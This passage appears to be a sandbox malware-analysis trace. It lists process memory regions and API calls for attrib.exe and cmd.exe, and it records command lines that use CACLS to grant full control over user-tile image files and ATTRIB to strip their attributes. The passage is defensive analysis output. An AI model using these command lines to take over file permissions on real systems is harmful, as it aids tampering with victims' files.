start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26665 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 26666 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26667 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26668 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26669 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26670 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 26671 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 26672 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26673 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26674 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26675 start_va = 
0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26676 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26677 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26678 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 543 os_tid = 0xf04 Thread: id = 544 os_tid = 0xf10 Process: id = "381" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0xed4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "379" os_parent_pid = "0xdac" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26679 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26680 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000030000" filename = "" Region: id = 26681 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26682 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26683 start_va = 0x890000 end_va = 0x896fff entry_point = 0x890000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26684 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26685 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26686 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26687 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 26688 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26689 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26690 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26691 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 26692 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 26693 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 26694 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26695 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26696 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26697 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26698 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26699 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26700 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26701 start_va = 0x76b40000 end_va = 0x76c08fff 
entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26702 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26703 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26704 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26705 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26706 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 26707 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26708 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 545 os_tid = 0x3c4 Process: id = "382" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xf74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26709 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26710 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26711 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26712 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26713 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26714 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26715 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26716 start_va = 0x7ffb0000 end_va = 0x7ffd2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26717 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 26718 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26719 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26720 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26721 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26722 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 26723 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 26724 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26725 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26726 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26727 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 
region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26728 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26729 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26730 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26731 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26732 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26733 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 26734 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26735 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26736 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26737 start_va = 
0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 26738 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26739 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26740 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 26741 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 26742 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 26743 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 546 os_tid = 0xf80 [0186.347] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afacc | out: lpSystemTimeAsFileTime=0x2afacc*(dwLowDateTime=0xa3f8f6c0, dwHighDateTime=0x1d440a9)) [0186.347] GetCurrentProcessId () returned 0xf74 [0186.347] GetCurrentThreadId () returned 0xf80 [0186.347] GetTickCount () returned 0x353d9 [0186.347] QueryPerformanceCounter (in: lpPerformanceCount=0x2afac4 | out: lpPerformanceCount=0x2afac4*=24313611302) returned 1 [0186.347] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0186.347] __set_app_type (_Type=0x1) [0186.347] __p__fmode () returned 0x76b331f4 [0186.348] __p__commode () returned 0x76b331fc [0186.348] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0186.348] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, 
_DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0186.348] GetCurrentThreadId () returned 0xf80 [0186.348] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf80) returned 0x38 [0186.348] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.348] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0186.348] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.348] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.348] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afa5c | out: phkResult=0x2afa5c*=0x0) returned 0x2 [0186.348] VirtualQuery (in: lpAddress=0x2afa93, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.348] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0186.348] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0186.348] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.348] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, 
AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0186.349] GetConsoleOutputCP () returned 0x1b5 [0186.349] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.349] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0186.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.349] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0186.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.349] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.349] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.349] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.349] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.349] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.349] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0186.350] GetEnvironmentStringsW () returned 0x410308* [0186.350] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0186.350] GetEnvironmentStringsW () returned 0x410308* [0186.350] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0186.350] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9cc | out: phkResult=0x2ae9cc*=0x40) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0xb8, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x1, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x1, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x0, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x40, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x40, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x40, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegCloseKey (hKey=0x40) returned 0x0 [0186.350] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9cc | out: phkResult=0x2ae9cc*=0x40) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x40, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x1, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9d4, 
lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x1, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x0, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.350] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x9, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.351] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x4, lpData=0x2ae9d8*=0x9, lpcbData=0x2ae9d0*=0x4) returned 0x0 [0186.351] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9d4, lpData=0x2ae9d8, lpcbData=0x2ae9d0*=0x1000 | out: lpType=0x2ae9d4*=0x0, lpData=0x2ae9d8*=0x9, lpcbData=0x2ae9d0*=0x1000) returned 0x2 [0186.351] RegCloseKey (hKey=0x40) returned 0x0 [0186.351] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886394 [0186.351] srand (_Seed=0x5b886394) [0186.351] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"" [0186.351] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"" [0186.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0186.351] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0186.351] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.351] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.351] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.351] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0186.351] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0186.351] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0186.352] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0186.352] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0186.352] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0186.352] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0186.352] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0186.352] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0186.352] GetEnvironmentStringsW () returned 0x412458* [0186.352] FreeEnvironmentStringsW (penv=0x412458) returned 1 [0186.352] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.352] GetEnvironmentVariableW (in: 